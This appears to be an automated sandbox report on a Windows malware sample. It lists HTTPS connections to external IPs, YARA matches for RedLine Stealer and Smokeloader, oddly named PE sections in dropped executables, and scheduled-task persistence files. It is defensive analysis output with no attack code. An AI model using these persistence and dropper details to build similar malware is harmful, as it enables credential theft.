Source: unknown	Network traffic detected: HTTP traffic on port 64270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64189
Source: unknown	Network traffic detected: HTTP traffic on port 64362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64259 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64081
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64084
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64088
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64087
Source: unknown	Network traffic detected: HTTP traffic on port 64339 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64078
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64199
Source: unknown	Network traffic detected: HTTP traffic on port 64361 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64093
Source: unknown	Network traffic detected: HTTP traffic on port 64212 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64095
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64096
Source: unknown	Network traffic detected: HTTP traffic on port 64132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64091
Source: unknown	Network traffic detected: HTTP traffic on port 64350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64141
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64261
Source: unknown	Network traffic detected: HTTP traffic on port 64154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64264
Source: unknown	Network traffic detected: HTTP traffic on port 64257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64263
Source: unknown	Network traffic detected: HTTP traffic on port 64292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64375
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64257
Source: unknown	Network traffic detected: HTTP traffic on port 64363 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64377
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64138
Source: unknown	Network traffic detected: HTTP traffic on port 64214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64259
Source: unknown	Network traffic detected: HTTP traffic on port 64340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64258
Source: unknown	Network traffic detected: HTTP traffic on port 64048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64139
Source: unknown	Network traffic detected: HTTP traffic on port 64197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64150
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64270
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64273
Source: unknown	Network traffic detected: HTTP traffic on port 64281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64275
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64274
Source: unknown	Network traffic detected: HTTP traffic on port 64352 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 64246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64267
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64148
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64269
Source: unknown	Network traffic detected: HTTP traffic on port 64328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64280
Source: unknown	Network traffic detected: HTTP traffic on port 64236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64282
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64281
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64284
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64283
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64285
Source: unknown	Network traffic detected: HTTP traffic on port 64351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64329 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64277
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64155
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64276
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64279
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64291
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64293
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64295

Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.32.136:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64095 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.65.39.112:443 -> 192.168.2.5:64195 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.5:64197 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64199 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64202 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64215 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:64216 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64214 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64218 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64220 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64219 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64226 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:64227 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64230 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64231 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64240 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64244 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64243 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64247 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64248 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64246 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64249 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64250 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64253 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64252 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64251 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64257 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64256 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64259 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64258 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64262 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64263 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64261 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64265 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64264 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64267 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64266 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64268 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64269 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64270 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64273 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64272 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64277 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64275 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64276 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64280 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64281 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64282 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64283 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64285 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64295 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64291 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64290 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64289 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64288 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64287 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64298 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64299 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64303 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64305 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64304 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64306 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64302 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64300 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64308 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64307 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64309 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64310 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64311 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64313 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64312 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64317 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64320 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64318 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64321 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64322 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64323 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64325 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64327 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64324 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64326 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64329 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64332 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64330 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64331 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64334 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64333 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64335 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64337 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64336 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64339 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64340 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64338 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64341 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64342 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64344 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64345 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64346 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64348 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64350 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64349 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64351 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64352 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64353 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64354 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64355 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64356 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64357 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64358 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64359 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64360 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64361 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64362 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64364 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64365 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64363 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64366 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64367 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64368 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64369 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64370 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64372 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64373 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.121.53:443 -> 192.168.2.5:64375 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.5:64377 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000015.00000002.2792244959.00000000026FD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002C.00000002.2899871505.00000000024B0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2443590110.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000015.00000002.2794658661.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002C.00000002.2902291876.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2443437674.000000000271D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

PE file contains section with special chars

Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name:
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name: .idata
Source: RoamingCBFCFBFBFB.exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: enter[1].exe.0.dr	Static PE information: section name: .idata
Source: enter[1].exe.0.dr	Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name:
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name: .idata
Source: RoamingIJDGCAEBFI.exe.0.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name:
Source: axplong.exe.5.dr	Static PE information: section name: .idata
Source: axplong.exe.5.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name:
Source: explorti.exe.8.dr	Static PE information: section name: .idata
Source: explorti.exe.8.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C5EB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C5EB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C5EB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C58F280

Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	File created: C:\Windows\Tasks\axplong.job			Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe	File created: C:\Windows\Tasks\explorti.job			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5835A0	0_2_6C5835A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F545C	0_2_6C5F545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C595440	0_2_6C595440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C5C10	0_2_6C5C5C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D2C10	0_2_6C5D2C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FAC00	0_2_6C5FAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5F542B	0_2_6C5F542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AD4D0	0_2_6C5AD4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5964C0	0_2_6C5964C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6CF0	0_2_6C5C6CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58D4E0	0_2_6C58D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596C80	0_2_6C596C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E34A0	0_2_6C5E34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5EC4A0	0_2_6C5EC4A0
